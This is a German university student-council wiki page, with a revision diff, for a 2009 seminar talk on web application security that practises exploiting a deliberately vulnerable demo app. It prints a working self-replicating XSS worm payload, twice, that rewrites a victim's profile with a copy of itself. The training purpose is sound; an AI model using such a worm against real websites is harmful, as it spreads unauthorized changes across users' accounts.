KunterBuntesSeminar-SS09/(Un)Sicherheit in Webanwendungen: Unterschied zwischen den Versionen

Aus Fachschaft_Informatik
Zur Navigation springen Zur Suche springen
Keine Bearbeitungszusammenfassung
(section "seminarvortrag" entfernt)
 
(2 dazwischenliegende Versionen von 2 Benutzern werden nicht angezeigt)
Zeile 5: Zeile 5:


Auch wenn du keine Vorkenntnisse hast und dir Begriffe wie "PHP", "HTTP" oder "SQL" nichts sagen, keine Panik, es wird alles von 0 an erklärt.
Auch wenn du keine Vorkenntnisse hast und dir Begriffe wie "PHP", "HTTP" oder "SQL" nichts sagen, keine Panik, es wird alles von 0 an erklärt.
= Seminarvortrag =
FIXME (nach dem Seminar)


== Vortragende ==
== Vortragende ==
Zeile 15: Zeile 11:


= Folien/Material =
= Folien/Material =
Folien sowie die präparierte Webanwendung liegen unter /home/j2008/8pridoeh/kbs/websicherheit/.
Folien: [[Bild:Sicherheit in webapplikationen.pdf]]
 
Präparierte Webanwendung: [[Bild:Stasivz.tar.gz]]


TODO: Direkt ins Wiki hochladen (PDF ist größer als 150 kb => geht nicht)
XSS-Wurm: <pre>hacked<script>(function(){a=new XMLHttpRequest();
a.open('POST','index.php?page=editprofile',true);
a.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
a.send('change_profile=1&movie=hacked<script>('.
concat(escape(arguments.callee.toString().concat(')();</scr').
concat('ipt>')))); })();</script></pre>
(Zeilenumbrüche vorher entfernen)


= Weiterführende Links =
= Weiterführende Links =

Aktuelle Version vom 19. November 2009, 23:47 Uhr

Das ist der 5. Termin vom KunterBuntesSeminar-SS09

Abstract[Bearbeiten]

Ich möchte euch die Grundlagen der Sicherheit in Webanwendungen erläutern und dabei typische Schwachstellen aufzeigen. Es wird darum gehen, wie man diese verhindert, aber auch ausnutzen kann. Das Ausnutzen der Schwachstellen werden wir interaktiv an einer präparierten Webanwendung üben um so das Gelernte zu festigen. Der Vortrag wird ein wenig PHP-lastig sein, dieses ist zwei Umständen geschuldet: Erstens sind die meisten Webanwendungen in PHP geschrieben und zweitens macht PHP es den Programmierern sehr leicht sich selbst ins Knie zu schiessen.

Auch wenn du keine Vorkenntnisse hast und dir Begriffe wie "PHP", "HTTP" oder "SQL" nichts sagen, keine Panik, es wird alles von 0 an erklärt.

Vortragende[Bearbeiten]

Henning (8pridoeh): Fragen zum Thema beantworte ich gerne. Ihr findet mich hin und wieder im c.t. oder anderswo in der Gegend.

Folien/Material[Bearbeiten]

Folien: Datei:Sicherheit in webapplikationen.pdf

Präparierte Webanwendung: Datei:Stasivz.tar.gz

XSS-Wurm:

hacked<script>(function(){a=new XMLHttpRequest();
a.open('POST','index.php?page=editprofile',true);
a.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
a.send('change_profile=1&movie=hacked<script>('.
concat(escape(arguments.callee.toString().concat(')();</scr').
concat('ipt>')))); })();</script>

(Zeilenumbrüche vorher entfernen)

Weiterführende Links[Bearbeiten]

Firefox-Addons:

Cheat Sheets: